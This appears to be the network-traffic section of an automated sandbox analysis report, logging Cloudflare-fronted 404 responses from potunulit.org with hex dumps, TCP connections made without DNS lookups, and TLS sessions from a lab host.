                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Jan 2023 07:58:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=TjweJ36MngU0TOwQYw2OFszR71DZfKSj40ELq9UXdFIZULlSQHr%2BiKkOgRFFgl2rZ9B34omO%2F67TuKmKUhLm8CR0Tpp28C45lWSYtRilLVN34GZGgT18v5puA9pY5Tie"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 784aab511db59072-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 32 63 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 f7 75 3a 52 99 10 cb 4d d6 f9 17 ad 3a bf 29 4a 54 78 c0 6a 05 7d 89 4a 67 0e 61 d4 0d 0a Data Ascii: 2cUys/~(u:RM:)JTxj}Jga
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Jan 2023 07:58:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=A%2BcGQdQa%2BYP1IIStb84RSgNmx4qp2LZbxQBmDu7kSU9zG5xWex1O%2FYQ3kL9OuAT4HN%2FEI26Lv4ahyQnUKWRfHDhB6viT52I3SdfQjz%2Fd2Am1832vMRpiHQTMA5zP0krj"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 784aab5ede979072-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Jan 2023 07:58:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WTmsgV4bwSQ1E3rF55OzURANp%2BTBtU9bUk2v%2FsQxteQQJCdXsOXWKtf0y4MEcD%2BxiFiiil0SOmR%2BZZxcNzP5hjTVAtttY9yO8tWXD1dgVNQLeOmdmYiRpkRZwFaDmJrv"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 784aab5f9fbb9072-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 37 61 66 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 e5 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 8e 5c 27 66 97 c3 31 0f 3b 93 ca c3 e7 00 16 00 39 a8 23 20 04 3e fb 09 aa 1c af 83 40 f0 10 c0 9b c7 54 b7 7f d8 74 b7 49 42 99 ce 53 f2 72 0d cc 88 99 8d 1a a1 1e db ee 2d 4c 2f ec 79 f8 b0 5b f3 71 54 d3 31 6e a6 75 56 76 a8 4f 92 3a 23 67 ac 5a 43 07 e5 7b b9 b9 e6 be cd 05 e6 28 a9 29 af b2 c8 46 f8 e8 f3 71 d7 21 7d c6 c0 70 a0 fa cb 1f 9e 1d 09 52 2b b5 c8 83 7b 32 44 f2 ff 56 21 f9 b8 c4 0d 13 13 bf 1e e1 92 c4 08 4d c4 08 a0 c5 b9 61 94 dc f5 69 ab 18 17 7e 5f af 9a 80 d6 c8 a0 c1 a9 dd 7a 0d 90 4d 19 e0 2c d5 a9 18 0a f5 96 be 27 51 61 9c d4 3e 7c 88 28 c8 48 6d a1 c0 4a 9a 03 fd ec 9e 9a 7f ac 87 2b bd 61 0d c0 5d bf 44 34 bd 79 12 6c 23 6c 29 6c 0a 8d c7 fd f4 0e a4 fb 7e 71 eb 80 f5 1a 78 9b 4a d8 19 ae cc 4f 3b 79 82 ae ec 07 01 4c d5 56 ad f3 57 cb 29 b9 92 ef cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 fd 13 ab 38 bb d6 ef 51 3f 27 a4 69 b7 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 c6 6f fc 9d 67 7f 55 40 e7 04 78 39 26 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3e 66 95 88 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 4e a1 54 55 8b fa d2 63 1b c3 cb 29 ef c0 e5 5b 1e 44 ab 1e 26 97 13 ee c3 ca 57 a3 4c 1d 85 1f d4 5c 68 91 9c 29 06 f1 0c 5e ae 63 75 97 7b 85 d2 1c 10 9f 4a 27 d9 b0 99 07 9a 8a cd 44 7f 74 79 be 6f 43 cc b9 8b 8b e1 62 7a d7 9c 88 c3 e0 6b a9 b4 fb 2f 1e 76 5c b3 ae 46 1f 50 e5 aa 7a 8f 56 68 e3 cd c8 d9 37 00 0e e0 1c c9 20 f5 52 48 c4 3a 96 4d cb e7 17 7f dc e5 be 63 d4 03 a6 60 eb ac 98 96 6f 0f ca 82 3f 26 2e 9f 94 ce ec 35 3e c0 a7 0d a8 ca d4 5f 29 43 43 9c 55 03 62 58 3a 1d b8 6e d8 cb e4 ae a7 a1 33 ed 54 da a9 c3 e8 cc 2f Data Ascii: 37af`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*\'f1;9# >@TtIBSr-L/y[qT1nuVvO:#gZC{()Fq!}pR+{2DV!Mai~_zM,'Qa>|(HmJ
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Jan 2023 07:58:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0b%2Bs%2BnxpIUqCpzku%2Bqb5l9ratCXqTbAazQEJDJCpXre1MzSgH2I%2BdYavv9Iwag%2BEE%2Bniko5gedJcJikccUcQObXYW67XrT28Fyy2PDGhiFU7Kv6c5q77Zsur7KTDik8q"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 784aab6b8f749072-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Jan 2023 07:58:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=AFxqIx3mGmNJfXX1Q%2F2qRsZ6%2F7R46gycW8WYIRm6%2FBXJlk6L8Mz5DqrNr1sqpRJLrKBHVPLXBFFT6lqFcz3BvBgEvabhie6GLd%2FrtbYWhnGaj2ZBOJwCxrbJe5pJBLg6"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 784aab6c788f9072-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 32 66 0d 0a 00 00 b5 55 08 b5 79 73 2f 7e 28 10 e8 c3 a7 f7 f7 75 3a 52 99 10 cb 4d d6 f9 17 ad 3a bf 29 4a 54 78 fc 6a 14 66 dd 09 7a 5e 78 9f a8 9c b9 0d 0a Data Ascii: 2fUys/~(u:RM:)JTxjfz^x
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Jan 2023 07:58:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Oy5UUgA1x1C79yIt4%2BZdc7aluLDTfScE5LCXVwHjSRJgz1Sg%2BybVxdv9aW5%2FARSia%2Bh%2BEYqjjRbw8yKBNGK%2FSyeD4L5ZOL%2FawCa1X4OQNdRkZeneTKq1%2FhH5b0C79srx"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 784aabacdc729c00-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Jan 2023 07:58:45 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=P%2Bx8SE70LyJcpRbJZ3ex6CPCQWyR773neMmVfROZCcgKltXnZNmsOnIZRIsZg3BBvhLybgi2Ta7RA7DZFy1g6DnkFyGyR2cb%2BvoZWox1JlgGqkCFVlkdYzBlNV%2F4O5e4"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 784aabae1e249c00-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 33 37 61 65 0d 0a 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 9d 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 8b bf 6a c6 ca 05 11 fc ae f2 5d 53 f6 c7 35 f3 73 07 03 d2 ff f9 da fb eb b2 82 71 cd a9 08 33 d1 60 73 45 7c 1f 57 44 b3 54 85 3c 50 15 51 fe 08 e2 82 7f 18 66 7d 28 2a a7 6a dd d6 bc db 43 15 5c 53 a6 cd f6 4d 55 60 91 54 5b fd 55 19 d0 ed 05 4c b1 17 20 58 4a 33 4f 62 3e 17 21 4b df a3 06 83 3a 56 2f cb 00 23 be 52 15 d7 17 53 53 fa cb 1f 9e 0d 09 52 2b e5 8d 83 7b 7e 45 f7 ff 88 36 6e db 8f 0d 13 13 bf de da 92 c4 0c 4f c5 03 a1 cb a1 61 7e de f5 69 b9 19 17 7e 5f af 9a a5 a4 f2 a0 cd b9 dd 7a 0d 90 4e 19 e0 2c 95 a9 18 1a f5 96 be 25 51 61 9a d4 3e 7c 88 28 c8 48 6b a1 c0 4a 9a 03 fd ec 9e aa 7b ac 87 2f bd 61 0d c0 5d bf 46 34 fd f8 12 4c 33 6c 21 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 e3 a0 f5 1a 20 9b 4a d8 19 ae cc 4f 3b 79 82 ae b2 e3 67 34 01 56 ad f3 13 a7 11 b9 72 ce cc 23 b2 eb 35 31 79 90 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 43 11 bb b6 81 43 4f 55 b7 69 b7 9f d3 cd cc 46 d9 88 2e ac af ed d9 55 3d 0f 81 68 92 0e ff 9d 7f 7f 55 40 57 64 7b 39 26 e7 ac 44 06 f6 27 2c 18 f8 c7 9b 88 e7 3d 66 f1 6a 5f b1 1d 32 12 51 8c d6 2c 4b 81 6b df 8e 82 01 e8 e4 1f 5e a1 90 0e a1 54 17 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 1e 54 ab 1e 06 c1 2a ee c3 ce 57 a3 04 1d 85 1f d6 5c 6d 91 3c 8f 3d f1 7c 4b ae 03 58 e5 1f e4 a7 7d 10 99 b8 9e d9 b0 61 79 a2 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b e1 62 7a d7 9c 88 c3 e0 2b a9 b4 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a 8f f6 6b e3 de e0 da 37 5f 81 e3 1c c8 20 f5 43 36 c7 3a 96 49 e7 ea 3f 2e dc e5 78 61 a0 66 fc 0e eb ac 92 08 6a 0f ca 86 e3 28 06 8c 96 ce ea 19 9e d5 8f 00 a8 ca de 21 2c 43 43 98 79 0e 4a 0d 3a 1d fe 6c ac b8 a0 cc c4 a1 39 5b 7b da a9 c7 c4 c5 07 dd e2 Data Ascii: 37ae`@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)|p|t]ShG*j]S5sq3`sE|WDT<PQf}(*jC\SMU`T[UL XJ3Ob>!K:V/#RSSR+{~E6nOa~i~_zN,%Qa>|(H
                                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 05 Jan 2023 07:58:51 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9FQGd3VtkwTSwJfNIhHYdGoKo3U2ZouLjGYHsfB%2FI6geREK753j8YK0x8Wg78GHZV%2BDNv6yMTCNSDabkK7b2k%2FpqssTxbfbpsC9WA0T5iV%2B%2FIrfS0FurWhTmkOPQ%2BFth"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 784aabd62e769c00-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 39 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 70 6f 74 75 6e 75 6c 69 74 2e 6f 72 67 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 191<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at potunulit.org Port 80</address></body></html>
                                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                                Source: unknownTCP traffic detected without corresponding DNS query: 23.211.6.115
                                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                                Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
                                Source: unknownTCP traffic detected without corresponding DNS query: 104.212.67.92
                                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.1
                                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.1
                                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.1
                                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.1
                                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.1
                                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.1
                                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.1
                                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.1
                                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.1
                                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.1
                                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.22
                                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.22
                                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.22
                                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.22
                                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.22
                                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.22
                                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.22
                                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.22
                                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.22
                                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.22
                                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.22
                                Source: unknownTCP traffic detected without corresponding DNS query: 20.190.159.22
                                Source: unknownHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29340.5; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com
                                Source: unknownHTTPS traffic detected: 20.190.159.1:443 -> 192.168.2.4:49698 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 20.190.159.19:443 -> 192.168.2.4:49701 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 20.65.78.40:443 -> 192.168.2.4:49715 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 20.65.78.40:443 -> 192.168.2.4:49721 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 80.67.82.211:443 -> 192.168.2.4:49734 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 80.67.82.211:443 -> 192.168.2.4:49732 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 80.67.82.211:443 -> 192.168.2.4:49735 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 80.67.82.211:443 -> 192.168.2.4:49731 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 80.67.82.211:443 -> 192.168.2.4:49733 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 95.217.49.230:443 -> 192.168.2.4:49739 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 68.65.123.54:443 -> 192.168.2.4:49743 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 68.65.123.54:443 -> 192.168.2.4:49747 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 20.82.154.241:443 -> 192.168.2.4:49874 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 20.82.154.241:443 -> 192.168.2.4:49886 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 20.82.154.241:443 -> 192.168.2.4:49894 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 20.82.154.241:443 -> 192.168.2.4:49902 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 157.240.20.35:443 -> 192.168.2.4:49907 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 20.82.154.241:443 -> 192.168.2.4:49916 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 20.82.154.241:443 -> 192.168.2.4:49932 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 20.82.154.241:443 -> 192.168.2.4:49937 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 5.135.247.111:443 -> 192.168.2.4:49942 version: TLS 1.2
